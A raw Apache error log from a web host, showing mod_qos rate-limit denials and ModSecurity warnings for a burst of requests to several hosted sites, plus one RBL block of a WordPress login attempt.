[Tue May 26 19:55:09.939672 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QegAAAZM
[Tue May 26 19:55:09.939686 2026] [qos:error] [pid 93868:tid 94351] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QeQAAAew
[Tue May 26 19:55:09.940510 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRWDRMqfxdEDkoszXlQAAAB4
[Tue May 26 19:55:09.940851 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QewAAAdc
[Tue May 26 19:55:09.942193 2026] [qos:error] [pid 93868:tid 94302] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QfAAAAbs
[Tue May 26 19:55:09.944442 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRWDRMqfxdEDkoszXlgAAABQ
[Tue May 26 19:55:09.944716 2026] [qos:error] [pid 93868:tid 94317] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QfQAAAco
[Tue May 26 19:55:09.946683 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QfgAAAZ4
[Tue May 26 19:55:09.947411 2026] [qos:error] [pid 93868:tid 94331] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRUqK9k_ZUB2Vp25QfwAAAdg
[Tue May 26 19:55:10.089393 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:43422] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRmDRMqfxdEDkoszXmAAAACw
[Tue May 26 19:55:10.089910 2026] [qos:error] [pid 93868:tid 94289] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QggAAAa4
[Tue May 26 19:55:10.090529 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:49050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QgwAAAa0
[Tue May 26 19:55:10.091391 2026] [qos:error] [pid 93868:tid 94384] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QhAAAAg0
[Tue May 26 19:55:10.091445 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:49154] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QhQAAAgg
[Tue May 26 19:55:10.092282 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:60186] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QhgAAAgM
[Tue May 26 19:55:10.095295 2026] [qos:error] [pid 93868:tid 94366] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QhwAAAfs
[Tue May 26 19:55:10.098978 2026] [qos:error] [pid 93868:tid 94269] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QiAAAAZo
[Tue May 26 19:55:10.100535 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRmDRMqfxdEDkoszXmQAAAGY
[Tue May 26 19:55:10.101555 2026] [qos:error] [pid 93868:tid 94280] [client 45.148.10.120:56914] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtRkqK9k_ZUB2Vp25QiQAAAaU
[Tue May 26 19:55:10.275781 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXVwAAAFU"]
[Tue May 26 19:55:10.277235 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXVgAAABk"]
[Tue May 26 19:55:10.278309 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXTAAAAAc"]
[Tue May 26 19:55:10.280635 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXUgAAAGQ"]
[Tue May 26 19:55:10.285178 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXTwAAAF4"]
[Tue May 26 19:55:10.287644 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QIAAAAeQ"]
[Tue May 26 19:55:10.287827 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXTgAAAFY"]
[Tue May 26 19:55:10.295003 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXTQAAACU"]
[Tue May 26 19:55:10.322204 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QRgAAAd8"]
[Tue May 26 19:55:10.323925 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXVAAAABg"]
[Tue May 26 19:55:10.324540 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXWgAAAH0"]
[Tue May 26 19:55:10.346093 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXSwAAAGI"]
[Tue May 26 19:55:10.351467 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QRAAAAdk"]
[Tue May 26 19:55:10.352706 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXawAAADA"]
[Tue May 26 19:55:10.359485 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXdAAAAE8"]
[Tue May 26 19:55:10.364412 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXcwAAABE"]
[Tue May 26 19:55:10.374251 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QQAAAAbM"]
[Tue May 26 19:55:10.387099 2026] [security2:error] [pid 93868:tid 94371] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QSAAAAgA"]
[Tue May 26 19:55:10.388599 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXgQAAAEo"]
[Tue May 26 19:55:10.394935 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QPQAAAdU"]
[Tue May 26 19:55:10.398613 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QRQAAAfw"]
[Tue May 26 19:55:10.400318 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXeAAAAHE"]
[Tue May 26 19:55:10.407352 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QSQAAAfg"]
[Tue May 26 19:55:10.408042 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QPwAAAgc"]
[Tue May 26 19:55:10.409315 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QTgAAAZs"]
[Tue May 26 19:55:10.411096 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QQgAAAZ8"]
[Tue May 26 19:55:10.412481 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QQQAAAfI"]
[Tue May 26 19:55:10.421920 2026] [security2:error] [pid 93868:tid 94375] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QQwAAAgQ"]
[Tue May 26 19:55:10.428032 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QUgAAAgw"]
[Tue May 26 19:55:10.429121 2026] [security2:error] [pid 93868:tid 94265] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QSgAAAZY"]
[Tue May 26 19:55:10.439498 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QUAAAAaY"]
[Tue May 26 19:55:10.446163 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QVAAAAag"]
[Tue May 26 19:55:10.456395 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QSwAAAZ0"]
[Tue May 26 19:55:10.464615 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QOwAAAfQ"]
[Tue May 26 19:55:10.470217 2026] [security2:error] [pid 93868:tid 94372] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtRkqK9k_ZUB2Vp25QgQAAAgE"]
[Tue May 26 19:55:10.471266 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QUQAAAcI"]
[Tue May 26 19:55:10.472834 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QUwAAAbY"]
[Tue May 26 19:55:11.065579 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25QvAAAAZM
[Tue May 26 19:55:11.065590 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25QvQAAAfo
[Tue May 26 19:55:11.065937 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszX9AAAAH8
[Tue May 26 19:55:11.066185 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25QwAAAAeE
[Tue May 26 19:55:11.069044 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszX9gAAABY
[Tue May 26 19:55:11.069088 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszYAQAAAGM
[Tue May 26 19:55:11.069145 2026] [qos:error] [pid 93868:tid 94363] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25QvgAAAfg
[Tue May 26 19:55:11.069292 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszX_AAAAFY
[Tue May 26 19:55:11.069307 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszX_QAAAEU
[Tue May 26 19:55:11.077737 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR2DRMqfxdEDkoszYDAAAAFY
[Tue May 26 19:55:11.219267 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:60084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QwgAAAfI
[Tue May 26 19:55:11.219334 2026] [security2:error] [pid 93576:tid 93698] [remote 213.171.208.232:47370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtR2DRMqfxdEDkoszXyQAAUHQ"]
[Tue May 26 19:55:11.219882 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:48930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QwwAAAck
[Tue May 26 19:55:11.220142 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:49220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR2DRMqfxdEDkoszYEgAAAB0
[Tue May 26 19:55:11.220155 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:49188] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QxQAAAgQ
[Tue May 26 19:55:11.220320 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:49206] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QxAAAAZ4
[Tue May 26 19:55:11.220344 2026] [qos:error] [pid 93868:tid 94383] [client 45.148.10.120:49478] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=103, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QxwAAAgw
[Tue May 26 19:55:11.220595 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:49384] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QxgAAAdw
[Tue May 26 19:55:11.222039 2026] [qos:error] [pid 93868:tid 94263] [client 45.148.10.120:43360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25QyAAAAZQ
[Tue May 26 19:55:11.222420 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:43452] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR2DRMqfxdEDkoszYEwAAADU
[Tue May 26 19:55:11.232310 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:43444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR2DRMqfxdEDkoszYFAAAAH8
[Tue May 26 19:55:11.281078 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QTQAAAao"]
[Tue May 26 19:55:11.282690 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXjQAAAH4"]
[Tue May 26 19:55:11.288797 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXjAAAAFo"]
[Tue May 26 19:55:11.289676 2026] [security2:error] [pid 93868:tid 94320] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QWwAAAc0"]
[Tue May 26 19:55:11.293110 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QXAAAAaA"]
[Tue May 26 19:55:11.295166 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QTAAAAbg"]
[Tue May 26 19:55:11.312212 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QVwAAAbc"]
[Tue May 26 19:55:11.313416 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXgwAAAF8"]
[Tue May 26 19:55:11.313967 2026] [security2:error] [pid 93868:tid 94355] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QWQAAAfA"]
